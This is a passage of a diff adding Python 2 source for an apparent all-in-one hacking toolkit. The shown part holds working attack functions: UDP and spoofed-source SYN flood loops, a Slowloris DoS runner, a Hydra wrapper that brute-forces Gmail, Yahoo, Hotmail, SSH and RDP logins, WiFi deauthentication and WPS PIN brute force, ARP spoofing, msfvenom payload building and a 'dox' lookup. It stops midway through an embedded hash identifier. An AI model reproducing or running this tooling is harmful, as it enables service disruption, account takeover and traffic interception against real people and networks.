dnsdump(domain) + os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) + try: + br.open(target) + print '%s Crawling the target for fuzzable URLs' % run + for link in br.links(): + if 'http' in link.url or '=' not in link.url: + pass + else: + url = target + '/' + link.url + params.append(url) + if len(params) == 0: + print '%s No fuzzable URLs found' % bad + quit() + print '%s Found %i fuzzable URLs' % (good, len(params)) + for url in params: + print url + sqli(url) + url = url.replace('=', '') + r = br.open(url).read() + if '' in r: + print '%s One or more parameters are vulnerable to XSS' % good + break + print '%s These are the URLs having parameters:' % good + for url in params: + print url + except: + pass +#------------------# +#INFO SCAN HOST END# + + +#INFO ON YOUR SYSTEM START# +#-------------------------# +def sysinfo(): + os.system("iwconfig") + k = raw_input("Interface: ") + os.system("clear") + os.system("ifconfig") + print "\n" + os.system("iwconfig") + print "\n" + os.system("neofetch") + print "\n" + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" + print "\n" + show = 'macchanger -s {0}'.format(k) + os.system(show) +#-----------------------# +#INFO ON YOUR SYSTEM END# + + +#ALL METASPLOIT EXPLOITS START# +#-----------------------------# +def msfex(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show exploits'""") +#---------------------------# +#ALL METASPLOIT EXPLOITS END# + + +#UDP DOS START# +#-------------# +def udp(): + target = raw_input(N+"Target:\033[91m ") + ip = socket.gethostbyname(target) + port = input(N+"Port:\033[91m ") + os.system("service tor restart") + print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) + os.system("sleep 2s") + sent = 0 + print "KILLING %s CONNECTIONS"%(ip) + while True: + sock.sendto(Gb, (ip,port)) + sock.sendto(bytes, (ip,port)) + sock.sendto(Kb, (ip,port)) + sent = sent + 1 + port = port + 1 + print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) + if port == 65534: + port = 1 +#-----------# +#UDP DOS END# + +#TCP FLOOD START# +#---------------# +def tcp(): + print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" + print "\n" + tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") + print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" + os.system("sleep 5") + os.system("python /root/hackers-tool-kit/tools/" + tcp) +#-------------# +#TCP FLOOD END# + + +#SYN FLOOD START# +#---------------# +def syn(): + def randomIP(): + ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) + return ip + + def randInt(): + x = random.randint(1000,9000) + return x + + def SYN_Flood(dstIP,dstPort,counter): + total = 0 + print "Packets are sending ..." + for x in range (0,counter): + s_port = randInt() + s_eq = randInt() + w_indow = randInt() + + IP_Packet = IP () + IP_Packet.src = randomIP() + IP_Packet.dst = dstIP + + TCP_Packet = TCP () + TCP_Packet.sport = s_port + TCP_Packet.dport = dstPort + TCP_Packet.flags = "S" + TCP_Packet.seq = s_eq + TCP_Packet.window = w_indow + + send(IP_Packet/TCP_Packet, verbose=0) + total+=1 + sys.stdout.write("\nTotal packets sent: %i\n" % total) + + + def info(): + + dstIP = raw_input ("\nTarget IP : ") + dstPort = input ("Target Port : ") + + return dstIP,int(dstPort) + + + def main(): + dstIP,dstPort = info() + counter = input ("Packets : ") + SYN_Flood(dstIP,dstPort,int(counter)) + + main() +#-------------# +#SYN FLOOD END# + + +#PING A HOST START# +#-----------------# +def ping(): + p = raw_input("Enter Host: ") + os.system("ping " + p) +#---------------# +#PING A HOST END# + + +#ALL METASPLOIT PAYLOADS START# +#-----------------------------# +def msfpa(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show payloads'""") +#---------------------------# +#ALL METASPLOIT PAYLOADS END# + + +#ALL METASPLOIT AUX START# +#------------------------# +def msfau(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show auxiliary'""") +#----------------------# +#ALL METASPLOIT AUX END# + + +#START METASPLOIT HANDLER START# +#------------------------------# +def multih(): + os.system("service postgresql start") + os.system("""msfconsole -x 'use multi/handler'""") +#----------------------------# +#START METASPLOIT HANDLER END# + + +#ALL METASPLOIT MODS START# +#-------------------------# +def msfall(): + os.system("service postgresql start") + os.sytem("""msfconsole -x 'show all'""") +#-----------------------# +#ALL METASPLOIT MODS END# + + +#HYDRA AUTOMATED START# +#---------------------# +def hydra(): + """ + This program is just a small program to shorten brute force sessions on hydra :) + But to be more satisfying results of the brute force. You better interact directly with hydra, + without having to use this black hydra console first: '). + If you find any errors in running our program. Can chat via facebook :). + Hydra is needed for the process of this program :). + """ + import sys, os, time + + # Restart #################### + def restart_program(): + python = sys.executable + os.execl(python, python, * sys.argv) + curdir = os.getcwd() + ############################## + + os.system("clear") + print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" + print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" + print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" + print G+"-----------------------------------------------------" + print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" + print R+" [*] Author: DedSecTL --- [*] Version 1.0" + print N+"c=={:::::::::::::::> Black Hydra Console" + print R+" [*] My FB : https://m.facebook.com/100004136748473" + print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" + print + print " ===|[ Brute Force ]|===" + print + print " [01] Cisco Brute Force " + print " [02] VNC Brute Force " + print " [03] FTP Brute Force " + print " [04] Gmail Brute Force " + print " [05] SSH Brute Force " + print " [06] TeamSpeak Brute Force " + print " [07] Telnet Brute Force " + print " [08] Yahoo Mail Brute Force " + print " [09] Hotmail Brute Force " + print " [10] Router Speedy Brute Force " + print " [11] RDP Brute Force " + print " [12] MySQL Brute Force " + print + print " [00] Exit" + print + bhydra = raw_input("[*] B-Hydra > ") + + if bhydra == '01' or bhydra == '1': + print + print " +---------------------------+" + print " | Cisco Brute Force |" + print " +---------------------------+" + print + print + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -P %s %s cisco" % (word, iphost)) + sys.exit() + + elif bhydra == '02' or bhydra == '2': + print + print " +---------------------------+" + print " | VNC Brute Force |" + print " +---------------------------+" + print + print + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) + iphost = raw_input("[*] IP/Hostname : ") + + elif bhydra == '03' or bhydra == '3': + print + print " +------------------------------+" + print " | FTP Brute Force |" + print " +------------------------------+" + print + print + user = raw_input("[*] User : ") + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '04' or bhydra == '4': + print + print " +------------------------------+" + print " | Gmail Brute Force |" + print " +------------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '05' or bhydra == '5': + print + print " +--------------------------------+" + print " | SSH Brute Force |" + print " +--------------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) + sys.exit() + + elif bhydra == '06' or bhydra == '6': + print + print " +-------------------------+" + print " | TeamSpeak Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) + sys.exit() + + elif bhydra == '07' or bhydra == '7': + print + print " +-------------------------+" + print " | Telnet Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) + sys.exit() + + elif bhydra == '08' or bhydra == '8': + print + print " +---------------------------+" + print " | Yahoo Brute Force |" + print " +---------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '09' or bhydra == '9': + print + print " +----------------------------+" + print " | Hotmail Brute Force |" + print " +----------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '10': + print + print " +-----------------------------+" + print " | Router Speedy Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) + sys.exit() + + elif bhydra == '11': + print + print " +----------------------------+" + print " | RDP Brute Force |" + print " +----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '12': + print + print " +-----------------------------+" + print " | MySQL Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) + + elif bhydra == '00' or bhydra == '0': + print "\n[!] Exit the Program..." + sys.exit() + + else: + print "\n[!] ERROR : Wrong Input" + time.sleep(1) + restart_program() +#-------------------# +#HYDRA AUTOMATED END# + + +#WORDLIST MAKER START# +#--------------------# +def cupp(): + os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") + print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" +#------------------# +#WORDLIST MAKER END# + + +#LIST FILES START# +#----------------# +def vdir(): + print "\n" + os.system("ls") + print Y+"! doesnt have to be these can be any directory !\033[0m" + print "\n" + h = raw_input("Directory Path: ") + print "\n" + print "--------------------------------------------------------------------------------------------------------------------------------------------" + os.system("ls " + h) + print "--------------------------------------------------------------------------------------------------------------------------------------------" +#--------------# +#LIST FILES END# + + +#MONITOR MODE OFF START# +#----------------------# +def monoff(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng stop " + i) +#--------------------# +#MONITOR MODE OFF END# + + +#TURN ON VPN START# +#-----------------# +def vpn(): + os.system("anonsurf start") + os.system("anonsurf myip") +#---------------# +#TURN ON VPN END# + + +#TURN OFF VPN START# +#------------------# +def vpnoff(): + os.system("anonsurf stop") + os.system("anonsurf myip") +#----------------# +#TURN OFF VPN END# + + +#SLOW LORIS DOS START# +#--------------------# +def slowl(): + de = raw_input("Delay: ") + tar = raw_input("RHOST: ") + port = raw_input("RPORT: ") + soc = raw_input("Sockets: ") + os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') + os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) + os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) + os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) + os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) + os.system('echo "run\n" >> slowl.rc') + os.system('msfconsole -r slowl.rc') + os.system('rm -rf slowl.rc') +#------------------# +#SLOW LORIS DOS END# + + +#OPEN DOX WEBSITE START# +#----------------------# +def pidox(): + print Y+"! USING FIREFOX !\033[0m" + os.system("sleep 2") + os.system("firefox https://pipl.com/") +#--------------------# +#OPEN DOX WEBSITE END# + + +#SCAN SPECIFIC NET START# +#-----------------------# +def specnet(): + jk = raw_input("BSSID: ") + kj = raw_input("ESSID: ") + os.system("iwconfig") + k = raw_input("INTERFACE: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) + if j == "n": + a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) +#---------------------# +#SCAN SPECIFIC NET END# + + +#DEFAULT WIFI PIN START# +#----------------------# +def pingen(): + j = raw_input("Enter BSSID: ") + a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) + os.system(a) +#--------------------# +#DEFAULT WIFI PIN END# + + +#WIFI PIN BRUTEFORCE START# +#-------------------------# +def reaver(): + os.system("iwconfig") + j = raw_input("Select Interface: ") + k = raw_input("Enter BSSID: ") + a = 'reaver -i {0} -b {1} -vv'.format(j,k) + os.system(a) +#-----------------------# +#WIFI PIN BRUTEFORCE END# + + +#DEAUTH ATTACK START# +#-------------------# +def deauth(): + print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" + j = raw_input("Enter BSSID> ") + os.system("iwconfig") + k = raw_input("Enter Interface> ") + a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) + os.system(a) +#-----------------# +#DEAUTH ATTACK END# + + +#MAC CHANGER START# +#-----------------# +def macc(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -r " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +#-----------------# +#MAC CHANGER START# + + +#MAC CHANGER OFF START# +#---------------------# +def macoff(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -p " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +#-------------------# +#MAC CHANGER OFF END# + + +#ARP SPOOF START# +#---------------# +def arpspoof(): + print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" + h = raw_input("Targets: ") + os.system('echo "net.sniff on\n" >> arp.cap') + os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) + os.system('echo "arp.spoof on\n" >> arp.cap') + print '\n\033[93mto stop type "exit"\033[0m' + os.system("sleep 2") + os.system("bettercap -no-history -caplet arp.cap") + os.system("rm arp.cap") +#-------------# +#ARP SPOOF END# + + +#SSL SCAN START# +#--------------# +def sslscan(): + j = raw_input('Enter Target: ') + a = 'sslscan {0}'.format(j) + os.system(a) +#------------# +#SSL SCAN END# + + +#MAKE A PAYLOAD START# +#--------------------# +def payload(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + print "\n" + f = raw_input("Select Payload: ") + l = raw_input("LHOST: ") + c = raw_input("LPORT: ") + print "\nExamples: py, php, exe\n" + s = raw_input("File Format: ") + h = raw_input("File Name: ") + a = 'msfvenom -p {0} LHOST={1} LPORT={2} -o /root/{3}.{4}'.format(f,l,c,h,s) + os.system(a) +#------------------# +#MAKE A PAYLOAD END# + + +#WORDLIST MAKER START# +#--------------------# +def crunch(): + print "minimal number of characters" + j = raw_input("[CRUNCH]: ") + print "maximum number of characters" + k = raw_input("[CRUNCH]: ") + print "what characters should be in it" + b = raw_input("[CRUNCH]: ") + print "name of file" + s = raw_input("[CRUNCH]: ") + a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) + os.system(a) + print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s +#------------------# +#WORDLIST MAKER END# + + +#INTERNET TRAFFIC START# +#----------------------# +def traff(): + os.system("iwconfig") + s = raw_input("Select Interface: ") + os.system("tcpdump -i " + s) +#--------------------# +#INTERNET TRAFFIC END# + + +#RESET ACCOUNT PASSWORD START# +#----------------------------# +def resa(): + j = raw_input("USERNAME: ") + k = raw_input("NEW PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'echo "{0}:{1}" | chpasswd'.format(j,k) + print "password for {0} has been reset".format(j) +#--------------------------# +#RESET ACCOUNT PASSWORD END# + + +#RESET UNIX PASSWORD START# +#-------------------------# +def resu(): + j = raw_input("PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'passwd {0}'.format(j) + print "unix password has been reset".format(j) +#-----------------------# +#RESET UNIX PASSWORD END# + + +#FIND HASH TYPE START# +#--------------------# +def hashid(): + #!/usr/bin/python + # encoding: utf-8 + # Hash Identifier v1.1 + # By Zion3R + # www.Blackploit.com + # Root@Blackploit.com + + logo=''' ######################################################################### + # __ __ __ ______ _____ # + # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # + # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # + # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # + # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # + # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # + # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # + # By Zion3R # + # www.Blackploit.com # + # Root@Blackploit.com # + #########################################################################''' + + algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} + + # hash.islower() minusculas + # hash.isdigit() numerico + # hash.isalpha() letras + # hash.isalnum() alfanumerico + + def CRC16(): + hs='4607' + if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101020") + def CRC16CCITT(): + hs='3d08' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101040") + def FCS16(): + hs='0e5b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101060") + + def CRC32(): + hs='b33fd057' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102040") + def ADLER32(): + hs='0607cb42' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102020") + def CRC32B(): + hs='b764a0d9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102060") + def XOR32(): + hs='0000003f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102080") + + def GHash323(): + hs='80000000' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103040") + def GHash325(): + hs='85318985' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103020") + + def DESUnix(): + hs='ZiY8YtDKXJwYQ' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: + jerar.append("104020") + + def MD5Half(): + hs='ae11fd697ec92c7c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105060") + def MD5Middle(): + hs='7ec92c7c98de3fac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105040") + def MySQL(): + hs='63cea4673fd25f46' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105020") + + def DomainCachedCredentials(): + hs='f42005ec1afe77967cbc83dce1b4d714' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106025") + def Haval128(): + hs='d6e3ec49aa0f138a619f27609022df10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106160") + def Haval128HMAC(): + hs='3ce8b0ffd75bc240fc7d967729cd6637' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106165") + def MD2(): + hs='08bbef4754d98806c373f2cd7d9a43c4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106060") + def MD2HMAC(): + hs='4b61b72ead2b0eb0fa3b8a56556a6dca' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106120") + def MD4(): + hs='a2acde400e61410e79dacbdfc3413151' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106040") + def MD4HMAC(): + hs='6be20b66f2211fe937294c1c95d1cd4f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106100") + def MD5(): + hs='ae11fd697ec92c7c98de3fac23aba525' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106020") + def MD5HMAC(): + hs='d57e43d2c7e397bf788f66541d6fdef9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106080") + def MD5HMACWordpress(): + hs='3f47886719268dfa83468630948228f6' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106140") + def NTLM(): + hs='cc348bace876ea440a28ddaeb9fd3550' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106029") + def RAdminv2x(): + hs='baea31c728cbf0cd548476aa687add4b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106027") + def RipeMD128(): + hs='4985351cd74aff0abc5a75a0c8a54115' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106180") + def RipeMD128HMAC(): + hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106185") + def SNEFRU128(): + hs='4fb58702b617ac4f7ca87ec77b93da8a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106200") + def SNEFRU128HMAC(): + hs='59b2b9dcc7a9a7d089cecf1b83520350' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106205") + def Tiger128(): + hs='c086184486ec6388ff81ec9f23528727' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106220") + def Tiger128HMAC(): + hs='c87032009e7c4b2ea27eb6f99723454b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106225") + def md5passsalt(): + hs='5634cc3b922578434d6e9342ff5913f7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106240") + def md5saltmd5pass(): + hs='245c5763b95ba42d4b02d44bbcd916f1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106260") + def md5saltpass(): + hs='22cc5ce1a1ef747cd3fa06106c148dfa' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106280") + def md5saltpasssalt(): + hs='469e9cdcaff745460595a7a386c4db0c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106300") + def md5saltpassusername(): + hs='9ae20f88189f6e3a62711608ddb6f5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106320") + def md5saltmd5pass(): + hs='aca2a052962b2564027ee62933d2382f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106340") + def md5saltmd5passsalt(): + hs='de0237dc03a8efdf6552fbe7788b2fdd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106360") + def md5saltmd5passsalt(): + hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106380") + def md5saltmd5saltpass(): + hs='d8f3b3f004d387086aae24326b575b23' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106400") + def md5saltmd5md5passsalt(): + hs='81f181454e23319779b03d74d062b1a2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106420") + def md5username0pass(): + hs='e44a60f8f2106492ae16581c91edb3ba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106440") + def md5usernameLFpass(): + hs='654741780db415732eaee12b1b909119' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106460") + def md5usernamemd5passsalt(): + hs='954ac5505fd1843bbb97d1b2cda0b98f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106480") + def md5md5pass(): + 